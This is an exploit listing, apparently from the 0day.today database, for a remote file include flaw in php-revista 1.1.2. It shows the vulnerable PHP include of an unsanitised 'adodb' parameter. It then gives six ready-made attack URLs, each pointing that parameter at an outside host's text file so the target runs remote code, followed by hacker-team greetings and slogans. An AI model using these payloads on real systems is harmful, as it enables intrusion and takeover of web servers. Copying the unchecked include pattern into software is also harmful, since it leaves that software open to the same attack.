[ authorization ] [ registration ] [ restore account ]
Contact us
You can contact us by:
0day Today Exploits Market and 0day Exploits Database

php-revista <= 1.1.2 (adodb) Multiple Remote File Include Vulnerabilities

Author
Cold Zero
Risk
[
Security Risk Unsored
]
0day-ID
0day-ID-1234
Category
web applications
Date add
03-12-2006
Platform
unsorted
=========================================================================
php-revista <= 1.1.2 (adodb) Multiple Remote File Include Vulnerabilities
=========================================================================



--------------------------------------||    Viva Palestine  ||-----------------------------------------
--------------------------------------||  Free Saddam Hussien  ||-----------------------------------------


php-revista <= 1.1.2 (index.php) Remote File Include Vulnerability


Found By  :  CoLd Zero  [ Wasem898 ]

Source    :  include_once ($4AZHAR_TeAM."Securty.");

            require ($SpECiALPowEr.oRg_TeAm."Securty");

            A_mal Hackeing Team _ Hacking



PalesTine Arab Muslim Hacker

######################################################
#
#            php-revista 1.1.2
#
# Class:     Remote File Include Vulnerability
# Published  2006-12-3
# Remote:    Yes
# Type:      high
# Author:    Cold Zero
#
######################################################
<?

include ("$adodb");
$obten_rev="select max(id_revista) as id from revista where terminada=1";
$obten = $DB->execute("$obten_rev");
$id_revista = $obten->fields["id"];

======================================================

Exploit :

Http://www.Victem.0/[php-revista_PaTH]/estilo/Digital_Multiplex/index.php?adodb=http://4azhar.com/soft.txt?
Http://www.Victem.0/[php-revista_PaTH]/estilo/discreet/index.php?adodb=http://4azhar.com/soft.txt?
Http://www.Victem.0/[php-revista_PaTH]/estilo/galveston/index.php?adodb=http://4azhar.com/soft.txt?
Http://www.Victem.0/[php-revista_PaTH]/estilo/mergedidea/index.php?adodb=http://4azhar.com/soft.txt?
Http://www.Victem.0/[php-revista_PaTH]/estilo/Shadow_Boxer/index.php?adodb=http://4azhar.com/soft.txt?
Http://www.Victem.0/[php-revista_PaTH]/estilo/Widget_Factory/index.php?adodb=http://4azhar.com/soft.txt?

======================================================




----  GreeTz: [MoHaNdKo]  [Cold One]  [Cold ThreE] [Viper Hacker] [The Wolf KSA] [o0xxdark0o[ [OrGanza] [H@mLiT] [Snake12][Root Shell]
             [Metoovit] [Fucker_net] [Rageb][CoDeR] [HuGe][Str0ke] [Dr.TaiGaR[ [JEeN HacKer] [Nazy L!unx[  Everyone I know


****************************************************************
# *www.4azhar.com Securty Team    >>      www.4azhar.com        *
# *SpeciaL PoweR SecuritY Team    >>      www.specialpower.org  *
# *A_mal Hacking Team             >>      -vv -l -p The-Pradise *
*****************************************************************


--------------------------------------||    Viva Palestine  ||-----------------------------------------
--------------------------------------||  Free Saddam Hussien  ||-----------------------------------------



#  0day.today [2024-11-16]  #